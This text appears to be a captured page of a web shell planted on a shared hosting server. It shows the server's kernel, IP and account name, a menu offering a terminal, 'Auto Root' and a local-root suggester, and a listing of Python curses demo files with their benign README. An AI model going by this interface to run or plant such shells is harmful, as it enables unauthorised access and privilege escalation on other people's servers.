Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 18.188.80.46
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib64 /
python2.7 /
Demo /
curses /
Delete
Unzip
Name
Size
Permission
Date
Action
README
852
B
-rw-r--r--
2020-04-19 21:13
life.py
7.18
KB
-rwxr-xr-x
2024-04-10 04:57
life.pyc
6.63
KB
-rw-r--r--
2024-04-10 04:58
life.pyo
6.63
KB
-rw-r--r--
2024-04-10 04:58
ncurses.py
6.49
KB
-rwxr-xr-x
2024-04-10 04:57
ncurses.pyc
5.71
KB
-rw-r--r--
2024-04-10 04:58
ncurses.pyo
5.71
KB
-rw-r--r--
2024-04-10 04:58
rain.py
2.35
KB
-rwxr-xr-x
2024-04-10 04:57
rain.pyc
2.24
KB
-rw-r--r--
2024-04-10 04:58
rain.pyo
2.24
KB
-rw-r--r--
2024-04-10 04:58
repeat.py
1.48
KB
-rwxr-xr-x
2024-04-10 04:57
repeat.pyc
1.42
KB
-rw-r--r--
2024-04-10 04:58
repeat.pyo
1.42
KB
-rw-r--r--
2024-04-10 04:58
tclock.py
3.25
KB
-rwxr-xr-x
2024-04-10 04:57
tclock.pyc
3.56
KB
-rw-r--r--
2024-04-10 04:58
tclock.pyo
3.56
KB
-rw-r--r--
2024-04-10 04:58
xmas.py
24.85
KB
-rw-r--r--
2020-04-19 21:13
xmas.pyc
19.4
KB
-rw-r--r--
2024-04-10 04:58
xmas.pyo
19.4
KB
-rw-r--r--
2024-04-10 04:58
Save
Rename
This is a collection of demos and tests for the curses module. ncurses demos ============= These demos are converted from the C versions in the ncurses distribution, and were contributed by Thomas Gellekum <tg@FreeBSD.org> I didn't strive for a `pythonic' style, but bluntly copied the originals. I won't attempt to `beautify' the program anytime soon, but I wouldn't mind someone else making an effort in that direction, of course. ncurses.py -- currently only a panels demo rain.py -- raindrops keep falling on my desktop tclock.py -- ASCII clock, by Howard Jones xmas.py -- I'm dreaming of an ASCII christmas Please submit bugfixes and new contributions to the Python bug tracker. Other demos =========== life.py -- Simple game of Life repeat.py -- Repeatedly execute a shell command (like watch(1))